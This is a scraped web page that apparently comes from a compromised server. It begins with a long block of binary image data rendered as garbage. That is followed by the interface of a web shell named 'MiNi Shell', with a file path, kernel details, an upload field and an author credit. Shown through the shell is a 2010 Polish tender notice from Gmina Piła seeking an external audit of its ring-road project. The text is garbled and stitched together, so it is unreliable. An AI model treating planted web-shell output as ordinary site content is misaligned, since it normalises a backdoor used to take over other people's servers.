JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/133937-N-2010.html

<p class="kh_header"><b>Piła: PRZEPROWADZENIE AUDYTU ZEWNĘTRZNEGO W ZAKRESIE PROJEKTU PN: NOWE POŁĄCZENIE DROGI KRAJOWEJ NR 11 I WOJEWÓDZKIEJ NR 188 - OSTATNI ETAP BUDOWY OBWODNICY MIASTA PIŁY REALIZOWANEGO W RAMACH WRPO 2007 - 2013, Priorytet II, Działanie 2.2.; Schemat I</b><br>
<b>Numer ogłoszenia: 133937 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE AUDYTU ZEWNĘTRZNEGO W ZAKRESIE PROJEKTU PN: NOWE POŁĄCZENIE DROGI KRAJOWEJ NR 11 I WOJEWÓDZKIEJ NR 188 - OSTATNI ETAP BUDOWY OBWODNICY MIASTA PIŁY REALIZOWANEGO W RAMACH WRPO 2007 - 2013, Priorytet II, Działanie 2.2.; Schemat I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie audytu zewnętrznego działań realizowanych w ramach projektu współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach Wielkopolskiego Regionalnego Programu Operacyjnego Województwa na lata 2007 - 2013, działanie 2.2. Poprawa dostępności do regionalnego i ponadregionalnego układu drogowego drogi wojewódzkie w miastach na prawach powiatu, powiatowe i gminne, schemat I. Drogi w granicach administracyjnych miast powyżej 50 tysięcy mieszkańców
Tytuł projektu:
 Nowe połączenie drogi krajowej nr 11 i wojewódzkiej nr 188 - ostatni etap budowy obwodnicy miasta Piły 
Projekt realizowany w ramach Umowy nr UDA-RPWP.02.02.01-30-07- 08-00 z dnia 07.08.2009 roku, zmienionej Aneksem pierwszym nr UDA-RPWP.02.02.01-30-007-08-01 z dnia 22.02.2010 roku.
Zakres rzeczowy projektu:
Przedmiotem projektu  jest przedsięwzięcie inwestycyjne polegające na realizacji ostatniego  etapu obwodnicy miasta Piły, tj. budowy drogi łączącej drogę krajową nr 11  i drogę wojewódzką nr 188. Realizacja projektu pozwoli na  uruchomienie obwodnicy w pełnym przebiegu, o dł 9,2 km. Projektowana droga o długości 1,357 km, ma swój poczatek wśród  istniejącej zabudowy miasta, na skrzyżowaniu z Al. Niepodległości. Następnie droga przebiega przez dolinę rzeki Gwdy. Koniec znajduje się  w rejonie skrzyżowania Al. Powstańców Wlkp. z ul. Głuchowską, na  wysokości ul. Gdańskiej. Teren przeznaczony pod budowę wewnętrznej obwodnicy w przeważającej większości jest terenem niezabudowanym. 
W ramach przedmiotowego projektu przewidziano budowę trzech  obiektów inzynierskich: trzyprzęsłowego mostu przez rzekę Gwdę o konstrukcji stalowej z płytą żelbetową; czteroprzęsłowej estakady o konstrukcji  żelbetowej i jednoprzęsłowego mostu przez starorzecze, wolnopodpartego o konstrukcji sprężonej. Konstrukcje obiektów  inżynierskich zapewniają właściwe przewietrzenie doliny rzeki Gwdy. W ramach projektu przewiduje się również budowę nowych chodników oraz ciągów pieszo - rowerowych. W ciągu obwodnicy przewidziano  budowę oraz przebudowę 9 skrzyżowań ,7 nowo budowanych i 2 przebudowywane i 2 zatok autobusowych. Planowane jest  oznaczenie przejść dla pieszych i przejazdów ścieżek rowerowych. Wzdłuż całego  odcinka obwodnicy przewidziano budowę oświetlenia ulicznego. Na skrzyżowaniach z Al. Niepodległości i Al. Powstańców Wlkp. przewidziano  budowę sygnalizacji świetlnych. W projekcie zastosowano szereg rozwiązań mających na celu poprawę środowiska naturalnego w obszarze.  Przedsięwzięcie nie będzie wywierać negatywnego wpływu na środowisko  gruntowo - wodne, ponieważ wody opadowe kierowane bedą do szczelnej kanalizacji i podczyszczone w separatorach. Zastosowane rozwiązanie instalacji odwodnienia drogi pozwoli zredukować obszar przekroczeń stężeń dopuszczalnych  zlokalizowanych obecnie na obszarze wzmożonego ruchu ulicznego w centrum miasta. W ramach projektu wykonywana będzie również  kanalizacja teletechniczna, która będzie częścią miejskiej szkieletowej  sieci szerokopasmowej miasta Piły.  
Okres rzeczowej realizacji projektu - 26.06.2009 r.  - 15.04.2011 r.; termin finansowej realizacji projektu do 15.05.2011 r.  
Całkowita wartość projektu wg umowy z Urzędem Marszałkowskim wynosi  43 850 544,39 PLN, z czego kwota dofinansowania  ze środków Europejskiego Funduszu Rozwoju Regionalnego 17 636 823,01 PLN 
1. Podmioty uprawnione do przepowadzenia audytu zewnętrznego projektu
Do prowadzenia audytu zewnętrznego projektu współfinansowanego ze środków EFRR w ramach WRPO uprawnione są osoby - podmioty zatrudniające osoby:
a. spełniające wymogi wskazane w art. 286 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych   Dz. U. Nr 157, poz. 1240, por.niżej  oraz
b. posiadające udokumentowane doświadczenie w badaniu projektów finansowanych ze środków publicznych   przynajmniej 1 projekt. Za udokumentowane doświadczenie uznaje się referencje   zaświadczenie
wystawione przez podmioty zlecające badanie audytowe.
1.2. Zgodnie z treścią art. 286 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych, audytorem  wewnętrznym może być osoba, która:
       a. ma obywatelstwo państwa członkowskiego Unii Europejskiej, lub innego państwa, którego obywatelom, na podstawie umów międzynarodowych lub przepisów prawa wspólnotowego,  przysługuje prawo podjęcia zatrudnienia na terytorium Rzeczypospolitej Polskiej oraz 
       b. ma pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych oraz
       c. nie była karana za umyślne przestępstwo lub umyślne przestępstwo skarbowe oraz
       d. posiada wyższe wykształcenie oraz
       e. posiada następujące kwalifikacje do przeprowadzenia audytu wewnętrznego - jeden z certyfikatów: Certified Internal Auditor CIA, Certified Government Auditing Professional CGAP; Certified Information Systems Auditor CISA; Association of Chartered Certified  Accountants ACCA; Cerified Fraud
           Examiner CFE; Certification in Control Self- Assessment CCSA; Certified Financial Services Auditor CFSA; Chartered Financial Analyst CFA, lub 
        f. złożyła w latach 2003 - 2006 z wynikiem pozytywnym egzamin na audytora wewnętrznego przed  Komisją Egzaminacyjną powołaną przez Ministra Finansów,  lub         g. posiada uprawnienia biegłego rewidenta,  lub 
        h. posiada dwuletnią praktykę w zakresie audytu wewnętrznego i legitymuje się dyplomem ukończenia studiów podyplomowych w zakresie audytu wewnętrznego, wydanym przez jednostkę  organizacyjną,  która w dniu wydania dyplomu była uprawniona zgodnie z odrębnymi ustawami do nadawania stopnia
naukowego doktora nauk ekonomicznych lub prawnych za praktykę w zakresie audytu wewnętrznego uznaje się udokumentowane przez kierownika jednostki wykonanie czynności, w wymiarze czasu pracy  nie mniejszym niż 0,5 etatu, związanych z:
przeprowadzeniem audytu wewnętrznego pod nadzorem audytora wewnętrznego,
realizacją przez inspektorów kontroli skarbowej czynności z zakresu certyfikacji i wydawania deklaracji zamknięcia pomocy finansowej ze środków pochodzących z Unii Europejskiej , o których mowa w ustawie z dnia 28 września 1991 r. o kontroli skarbowej tj. Dz. U. z 2004 r. nr 8 poz. 65 z późn.zm,
nadzorowaniem lub wykonywaniem czynności kontrolnych, o których mowa w ustawie z dnia 23 grudnia 1994 r. o Najwyższej Izbie Kontroli tj. z 2007 r. Dz. U. Nr 231, poz. 1701 z późn.zm,  lub i ukończyła aplikację kontrolerską i złożyła egzamin kontrolerski z wynikiem pozytywnym przed komisją   egzaminacyjną powołaną przez Prezesa Najwyższej Izby Kontroli,   lub  j.  złożyła z wynikiem pozytywnym egzamin kwalifikacyjny na stanowisko inspektora kontroli  skarbowej.
Zakres audytu
Zakres audytu ma wyczerpać wymagania obowiązujących w czasie realizacji niniejszej umowy Wytycznych Instytucji Zarządzającej Wielkopolskim Regionalnym Programem Operacyjnym na lata 2007 - 2013 w zakresie wyboru audytora oraz prowadzenia i dokumentowania audytu zewnętrznego projektu dofinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu I - Działania 1.4, 1.5, 1.6 i 1.7 oraz Priorytetów II - VI.
Ocena gotowości organizacyjnej Beneficjenta i procedur wewnętrznych, w tym:
a. wielkość i przygotowanie kadr,
b. sprzęt niezbędny do realizacji projektu, 
c. identyfikacja zadań wrażliwych przede wszystkim dokonywanie wyboru wykonawców  dostawców, zawieranie umów, odbiór robót, dostaw i usług, zatwierdzanie faktur do wypłaty, dokonywanie płatności, księgowanie operacji finansowych,
d. podział zadań w projekcie, w tym rozdział kluczowych funkcji, 
e. istnienie i jakość pisemnych procedur postępowania oraz wzorów dokumentów,
f. bezpieczeństwo IT.
Audyt finansowy, w tym: 
a. sprawdzenie, czy opracowane przez Beneficjenta procedury zarządzania środkami finansowymi zapewniają rzetelną i terminową realizację i dokumentowanie operacji, 
b. sprawdzenie, czy procedury wewnętrzne Beneficjenta gwarantują rzetelność sprawozdań z realizacji projektu i wniosków o płatność, 
c. sprawdzenie zgodności sprawozdań z realizacji projektów i wniosków o płatność z dokumentami źródłowymi, ewidencją księgową oraz wnioskiem i umową o dofinansowanie projektu, 
d. ocena prawidłowości i wiarygodności poniesionych w ramach projektu wydatków faktycznie poniesione, zgodne z zapisami w dokumentacji projektowej, w terminie realizacji projektu, zasadne, celowe i oszczędne, nie odbiegają od cen w regionie, istnieje wkład własny Beneficjenta, płatności zostały przekazane na rachunki wykonawców wskazane w zawartych z nimi umowach, 
e. kontrola formalna faktur i ich zgodności z zapisami umów z wykonawcami, 
f. badanie poprawności księgowania zgodność z zakładowym planem kont, wyodrębniona ewidencja księgowa, zgodność zapisów w ewidencji księgowej z treścią dokumentów źródłowych. 
Audyt realizacji projektu, w tym: 
a. sprawdzenie zgodności realizacji projektu z przepisami prawa prawo zamówień publicznych , prawo budowlane, ochrona środowiska, przepisy o rachunkowości oraz o finansach publicznych itd.,
b. ocena zgodności realizacji projektu z dokumentami programowymi program operacyjny, wytyczne i instrukcje, podręczniki procedur,
c. sprawdzenie zgodności realizacji projektu z zapisami wniosku o dofinansowanie umowy o dofinansowanie, 
d. potwierdzenie zgodności zakresu umów zawartych z wykonawcami z dokumentacją projektową wniosek o dofinansowanie z załącznikami oraz z dokumentacją z postępowania o udzielenie zamówienia publicznego specyfikacja istotnych warunków zamówienia z załącznikami, oferta wybranego wykonawcy, 
e. sprawdzenie planowanego sposobu monitorowania osiągania celów projektu, 
f. potwierdzenie zgodności sprawozdań z realizacji projektu ze stanem faktycznym, 
g. sprawdzenie, czy cele projektu zostały zrealizowane i czy osiągnięto zakładany na dany okres poziom wskaźników. 
Wizyta na miejscu realizacji projektu, w tym sprawdzenie: 
a. sprawdzenie czy zrealizowana inwestycja jest zgodna z zapisami we wniosku o dofinansowanie projektu, w umowie o dofinansowanie projektu i w aneksach do tej umowy oraz w dokumentacji powykonawczej, w protokołach odbioru robót w toku, w protokołach odbioru zakupionego sprzętu oraz potwierdzenie poprawności prawidłowości funkcjonowania zrealizowanej inwestycji np. wodociąg, oczyszczalnia, zakupiony sprzęt itp., 
b. poprawności prawidłowości promocji unijnego źródła dofinansowania, tzn. potwierdzenie, że działania promocyjne i informacyjne były prowadzone zgodnie z zapisami we wniosku o dofinansowanie projektu, w umowie o dofinansowanie projektu i w obowiązujących Beneficjenta wytycznych tablice, oznaczenia pomieszczeń i materiałów rozdawanych uczestnikom wydarzeń, materiały i gadżety reklamowe oraz inne materiały zakupione na potrzeby działań promocyjnych i informacyjnych itp.. 
Ocena prawidłowości i rzetelności prowadzenia i archiwizowania dokumentacji, w tym sprawdzenie czy: 
a. wprowadzono mechanizmy zapewniające właściwy obieg i sposób archiwizowania wszystkich dokumentów związanych z realizacją audytowanego projektu wniosek o dofinansowanie, umowa o dofinansowanie i aneksy, wnioski o płatność, oryginały dowodów księgowych, dokumentacja przetargowa, korespondencja prowadzona w ramach realizacji projektu itd.,
b. istnieje możliwość odtworzenia przebiegu realizacji projektu w wymaganych umową terminach, 
c. wprowadzone mechanizmy w postaci wewnętrznych regulacji są zgodne z zapisami umowy o dofinansowanie projektu. 
Sprawdzenie zgodności projektu z politykami wspólnotowymi. 
Sprawdzenie wdrożenia zaleceń pokontrolnych oraz usunięcia nieprawidłowości uchybień stwierdzonych w trakcie kontroli prawidłowości realizacji projektu, prowadzonych przed realizacją audytu jeżeli dotyczy.
Analiza powodzenia projektu.
Czynności doradcze. 
Audyt powinien być przeprowadzony w oparciu o:
1)uznawane standardy audytu np. obowiązujące w Polsce Międzynarodowe Standardy Profesjonalnej Praktyki Audytu Wewnętrznego - załącznik nr 1 do Komunikatu Nr 1 Ministra Finansów z dnia 19 lutego  2009 r. dostępne na stronie www.mofnet.gov.pl oraz
2)Aktualne Wytyczne Instytucji Zarządzającej Wielkopolskim Regionalnym Programem Operacyjnym na lata 2007 - 2013 w zakresie wyboru audytora oraz prowadzenia i dokumentowania audytu zewnętrznego projektu dofinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu I - Działania 1.4, 1.5, 1.6 i 1.7 oraz Priorytetów II - VI. Z dnia 11 marca 2010 r.  dostępne na stronie www.wrpo.wielkopolskie.pl
Ponadto, Wykonawca zamówienia zobowiązany jest do:
1)przekazania Zamawiającemu kopii dokumentacji roboczej: notatek, kwestionariuszy oceny, list sprawdzających itp. lub co najmniej wykazu badanych dokumentów i wykazu sporządzonych dokumentów roboczych,
2)prowadzenia audytu w sposób uwzględniający min. analizy dokumentów, wywiady z pracownikami i wykonawcami, oględziny inwestycji
3)dokumentowania audytu poprzez min. wykaz weryfikowanych dokumentów, listy sprawdzające, kwestionariusze samooceny, notatki protokoły z wywiadów i spotkań
4)organizacji spotkań otwierających, zamykających oraz spotkań w trakcie prowadzenia audytu udokumentowanych notatkai protokołami podpisanymi przez uczestników spotkań
5)wyznaczenia osoby osób do kontaktów z Zamawiającym komunikacja w formie pisemnej 
6)sporządzenia sprawozdania z przeprowadzonego audytu, według pkt 4.1. aktualnych Wytycznych Instytucji Zarządzającej Wielkopolskim Regionalnym Programem Operacyjnym na lata 2007 - 2013 w zakresie wyboru audytora oraz prowadzenia i dokumentowania audytu zewnętrznego projektu dofinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu I - Działania 1.4, 1.5, 1.6 i 1.7 oraz Priorytetów II - VI. dostępnych na stronie www.wrpo.wielkopolskie.pl
7)stosowania na wszystkich dokumentach sporządzanych w ramach prowadzonego audytu znaków informacyjnych o źródłach dofinansowania, zgodnie z wytycznymi Zamawiającego
8)przygotowania sprawozdania  raportu   z audytu w trzech egz. w wersji papierowej oraz jeden egz. na nośniku CD.
Badaniem audytowym objąć należy 100,00 dokumentacji związanej z realizowanym projektem, przez co należy rozumieć całość dokumentów dostępnych w momencie rozpoczęcia czynności audytowych na podstawie podpisanej z audytorem umowy. 
Miejscem przechowywania dokumentacji podlegającej badaniu jest budynek Urzędu Miasta Piły Pl. Staszica 10, 64-920 Piła.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku
Zamawiający wymaga, aby zespół audytowy składał się co najmniej z 2 osób:
w tym:  
1 osoba  - posiadająca wyższe wykształcenie, posiada uprawnienia biegłego rewidenta  

1 osoba - posiadająca wyższe wykształcenie i odpowiednie kwalifikacje w zakresie
                 przeprowadzenia audytu określone w art. 286 ustawy  o finansach publicznych
                 (Dz. U. 2009 Nr 157 poz. 1240)
w tym, jedna z tych osób winna spełniać wymogi zawarte w części I pkt 4 ppkt 1.1. lit b) SIWZ. 
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu  na podstawie oświadczeń i dokumentów o których mowa w SIWZ, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo
2. Parafowany projekt umowy
3. Pisemne zobowiazania do przestrzegania standardów podczas przeprowadzania audytu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy,
b) wprowadzone zostały dodatkowe wymagania dla inwestycji współfinansowanych z funduszy UE.
c) z uwagi na niezależne od stron umowy zmiany dotyczące osób kluczowych dla realizacji umowy
    (choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne, teleadresowe).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.um.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 09:00, miejsce: Kancelaria Główna p. 134 Urzad Miasta Piły pl. Staszica 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com